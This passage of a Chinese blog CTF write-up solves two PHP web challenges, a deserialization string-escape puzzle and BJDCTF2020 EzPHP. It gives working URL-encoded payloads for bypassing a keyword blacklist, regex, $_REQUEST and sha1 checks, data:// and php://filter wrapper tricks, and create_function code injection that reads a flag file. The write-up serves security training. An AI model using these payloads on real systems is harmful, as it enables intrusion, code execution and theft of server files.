<p>根据网上查到的信息，我现在要做的就是闭合掉这个序列化的值。<br>反序列化只会识别第一对{}中间的内容，后面多出来的会被丢弃；<br>而且属性值会被识别为从开头的:"到结尾的";之间的内容。<br>现在开始改造我能提交的数据。</p>
<p>这时候filter的好处就来了：如果提交的数据中包含<br>'php'、'flag'、'php5'、'php4'、'fl1g'，都会被替换为空字符串""。<br>这个替换发生在serialize()之后，值变短了，但前面已经写好的长度s:N没有变，于是后面的内容会被当作新的键值对来解析——根本原因是对已经序列化好的字符串做过滤，而不是在序列化之前检查各个值。<br>构造提交</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[fuck_flag_php_php]&#x3D;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="easy_serialize_phppng.png" alt="提交"><br>提交后得到了这么一个东西</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:2:&#123;s:17:&quot;fuck___&quot;;s:51:&quot;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;&quot;;s:3:&quot;img&quot;;s:20:&quot;Z3Vlc3RfaW1nLnBuZw&#x3D;&#x3D;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>完美闭合：s:17:"fuck___";s:51:"he";<br>正式提交得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$flag &#x3D; &#39;flag in &#x2F;d0g3_fllllllag&#39;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>将/d0g3_fllllllag转为BASE64：L2QwZzNfZmxsbGxsbGFn<br>再提交</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[fuck_flag_php_php]&#x3D;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;L2QwZzNfZmxsbGxsbGFn&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag{2c95fea4-1864-4a87-b05d-ae3bb3c85624} </p>
<h2 id="EzPHP"><a href="#EzPHP" class="headerlink" title="EzPHP"></a>EzPHP</h2><p>根据题目提示，在<br><a href="https://github.com/BjdsecCA/BJDCTF2020_January/blob/master/Web/bjdctf2020_web_ezphp/html/" target="_blank" rel="noopener">https://github.com/BjdsecCA/BJDCTF2020_January/blob/master/Web/bjdctf2020_web_ezphp/html/</a><br>找到关键代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"></span><br><span 
class="line">$file = <span class="string">"1nD3x.php"</span>;</span><br><span class="line">$shana = $_GET[<span class="string">'shana'</span>];</span><br><span class="line">$passwd = $_GET[<span class="string">'passwd'</span>];</span><br><span class="line">$arg = <span class="string">''</span>;</span><br><span class="line">$code = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br /&gt;&lt;font color=red&gt;&lt;B&gt;This is a very simple challenge and if you solve it I will give you a flag. Good Luck!&lt;/B&gt;&lt;br&gt;&lt;/font&gt;"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_SERVER) &#123; </span><br><span class="line">    <span class="keyword">if</span> (</span><br><span class="line">        preg_match(<span class="string">'/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i'</span>, $_SERVER[<span class="string">'QUERY_STRING'</span>])</span><br><span class="line">        )  </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'You seem to want to do something bad?'</span>); </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/http|https/i'</span>, $_GET[<span class="string">'file'</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">'/^aqua_is_cute$/'</span>, $_GET[<span class="string">'debu'</span>]) &amp;&amp; $_GET[<span class="string">'debu'</span>] !== <span class="string">'aqua_is_cute'</span>) &#123; </span><br><span class="line">        $file = $_GET[<span class="string">"file"</span>]; </span><br><span 
class="line">        <span class="keyword">echo</span> <span class="string">"Neeeeee! Good Job!&lt;br&gt;"</span>;</span><br><span class="line">    &#125; </span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">'fxck you! What do you want to do ?!'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_REQUEST) &#123; </span><br><span class="line">    <span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $value) &#123; </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">'/[a-zA-Z]/i'</span>, $value))  </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'fxck you! I hate English!'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (file_get_contents($file) !== <span class="string">'debu_debu_aqua'</span>)</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"Aqua is the cutest five-year-old child in the world! Isn't it ?&lt;br&gt;"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( sha1($shana) === sha1($passwd) &amp;&amp; $shana != $passwd )&#123;</span><br><span class="line">    extract($_GET[<span class="string">"flag"</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Very good! you know my password. But what is flag?&lt;br&gt;"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"fxck you! you don't know my password! And you don't know sha1! 
why you come here!"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/^[a-z0-9]*$/isD'</span>, $code) || </span><br><span class="line">preg_match(<span class="string">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\&#123;|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i'</span>, $arg) ) &#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"&lt;br /&gt;Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="</span>); </span><br><span class="line">&#125; <span class="keyword">else</span> &#123; </span><br><span class="line">    <span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line">    $code(<span class="string">''</span>, $arg); </span><br><span class="line">&#125; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>一堆需要绕过的东西，一步一步来吧。</p>
<h3 id="SERVER-‘QUERY-STRING’-绕过"><a href="#SERVER-‘QUERY-STRING’-绕过" class="headerlink" title="$_SERVER[‘QUERY_STRING’]绕过"></a>$_SERVER[‘QUERY_STRING’]绕过</h3><p>PHP中$_SERVER['QUERY_STRING']拿到的是未经URL解码的原始查询字符串，而$_GET[]、$_POST[]里的值会被解码，所以只要把参数进行url编码即可绕过这个黑名单。从防守的角度看，这类检查应当针对解码后的实际参数值，而不是原始查询字符串。</p>
<h3 id="preg-match绕过"><a href="#preg-match绕过" class="headerlink" title="preg_match绕过"></a>preg_match绕过</h3><p>第一段要绕过的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;http|https&#x2F;i&#39;, $\_GET\[&#39;file&#39;\])</span><br></pre></td></tr></table></figure>
<p>不让file参数里出现http和https；</p>
<p>第二段要绕过的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;^aqua_is_cute$&#x2F;&#39;, $_GET[&#39;debu&#39;]) &amp;&amp; $_GET[&#39;debu&#39;] !&#x3D;&#x3D; &#39;aqua_is_cute&#39;</span><br></pre></td></tr></table></figure>
<p>这个正则没有D修饰符，$可以匹配到末尾换行符之前的位置，也就是说preg_match只匹配到第一行结束，所以在句尾加上%0a(换行符)即可绕过。</p>
<p>构造一个payload测试一下前面几步的分析。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%64%65%62%75&#x3D;%61%71%75%61%5f%69%73%5f%63%75%74%65%0A</span><br></pre></td></tr></table></figure>
<p>返回如下结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</span><br><span class="line">Neeeeee! Good Job!</span><br><span class="line">fxck you! I hate English!</span><br></pre></td></tr></table></figure>
<p>看来是可行的。</p>
<h3 id="REQUEST绕过"><a href="#REQUEST绕过" class="headerlink" title="$_REQUEST绕过"></a>$_REQUEST绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_REQUEST) &#123; </span><br><span class="line">    <span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $value) &#123; </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">'/[a-zA-Z]/i'</span>, $value))  </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'fxck you! I hate English!'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>
<p>$_REQUEST同时接受GET和POST的数据，而且POST的优先级更高，所以如果POST和GET的参数名一样，会使用POST传过来的值。<br>这里的正则是只要值里包含字母就退出，用POST提交同名的纯数字值即可。<br><img src="EzPHP_1.png" alt=""></p>
<h3 id="文件内容绕过"><a href="#文件内容绕过" class="headerlink" title="文件内容绕过"></a>文件内容绕过</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents($file) !&#x3D;&#x3D; &#39;debu_debu_aqua&#39;</span><br></pre></td></tr></table></figure>
<p>这里是读取一个文件的内容然后跟debu_debu_aqua比较。由于不能使用http和https协议通过网络获取文件，只能考虑用别的方式（FTP也许行，可惜没有外网服务器）。这里考虑使用PHP伪协议，网上说php://input或data://这两个比较靠谱。<br>php://input是把POST过来的原始数据整体当做文件内容；<br> data://有以下几种用法：<br>  data://text/plain,&lt;?php phpinfo()?&gt;<br>  data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=<br>那么我自己构造一个data://来测试一下吧。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,ZGVidV9kZWJ1X2FxdWE&#x3D;</span><br></pre></td></tr></table></figure>
<p>然后转urlencode一下得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%66%69%6c%65&#x3D;%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%5a%47%56%69%64%56%39%6b%5a%57%4a%31%58%32%46%78%64%57%45%3d</span><br></pre></td></tr></table></figure>
<h3 id="sha1绕过"><a href="#sha1绕过" class="headerlink" title="sha1绕过"></a>sha1绕过</h3><p>与MD5绕过一样，PHP中sha1()函数不处理数组：传入数组时不会计算哈希而是返回空值（PHP 8起会直接抛出TypeError），两个空值用===比较相等，而两个不同的数组用!=比较并不相等，因此可以直接使用数组绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shana[]&#x3D;1&amp;passwd[]&#x3D;2;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%73%68%61%6e%61[]&#x3D;1&amp;%70%61%73%73%77%64[]&#x3D;2</span><br></pre></td></tr></table></figure>
<h3 id="最终关卡"><a href="#最终关卡" class="headerlink" title="最终关卡"></a>最终关卡</h3><p>关键点一</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">extract($_GET[&quot;flag&quot;]);</span><br></pre></td></tr></table></figure>
<p>通过用户提交的flag数组，向$code和$arg传递最终的破解内容。<br>关键点二</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\&#96;|\&#123;|\%|x|\&amp;|\$|\*|\||\&lt;|\&quot;|\&#39;|\&#x3D;|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^&#x2F;i&#39;, $arg) )</span><br></pre></td></tr></table></figure>
<p>过滤掉了很多东西，需要绕过。<br>已知的办法有：<br>1、get_defined_vars()绕过。<br>2、define定义常量，fopen/fgets获取文件内容。<br>3、取反绕过+伪协议读源码。<br>4、^异或和~按位取反绕过。<br>关键点三</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$code(&#39;&#39;, $arg);</span><br></pre></td></tr></table></figure>
<p>这里的考点就是create_function函数。<br>create_function内部相当于eval，已在PHP 7.2弃用、PHP 8.0移除；这个东西真有点不好理解，上代码帮助自己理解。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//建立函数的骚操作</span></span><br><span class="line">$myFunc = create_function(<span class="string">'$fuck'</span>, <span class="string">'return $fuck;&#125;echo "ffuck";//'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">//实际被执行的代码，太TM骚了。</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">myFunc</span><span class="params">($fuck)</span></span></span><br><span class="line"><span class="function"></span>&#123; <span class="keyword">return</span> $fuck; &#125; </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"ffuck"</span>;<span class="comment">//&#125;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>测试代码一：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flag[code]&#x3D;create_function;</span><br><span class="line">flag[arg]&#x3D;;&#125;require(base64_decode(cmVhMWZsNGcucGhw));var_dump(get_defined_vars());&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">%66%6c%61%67[%63%6f%64%65]&#x3D;%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&amp;</span><br><span class="line">%66%6c%61%67[%61%72%67]&#x3D;%3b%7d%72%65%71%75%69%72%65%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%4d%57%5a%73%59%57%63%75%63%47%68%77%29%29%3b%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f</span><br></pre></td></tr></table></figure>
<p>结果不对，得想另一种办法了，使用PHP伪协议试试。<br>写一段取反的代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> rawurlencode(<span class="string">";&#125;require(~("</span>.~<span class="string">"php://filter/read=convert.base64-encode/resource=rea1fl4g.php"</span>.<span class="string">"));//"</span>);</span><br></pre></td></tr></table></figure>
<p>合并构造一下。<br><img src="EzPHP_2.png" alt=""><br>终于拿到了flag。</p>

    </div>

    
    
    


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E7%BB%83%E4%B9%A0%E9%A2%98/" rel="tag"># 练习题</a>
              <a href="/tags/CTF%E8%AF%BE/" rel="tag"># CTF课</a>
              <a href="/tags/WEB/" rel="tag"># WEB</a>
              <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag"># 文件上传</a>
              <a href="/tags/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag"># PHP反序列化</a>
          </div>

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          


        </div>
          
  



      </div>
    </main>

  </div>

  













  

  

</body>
</html>
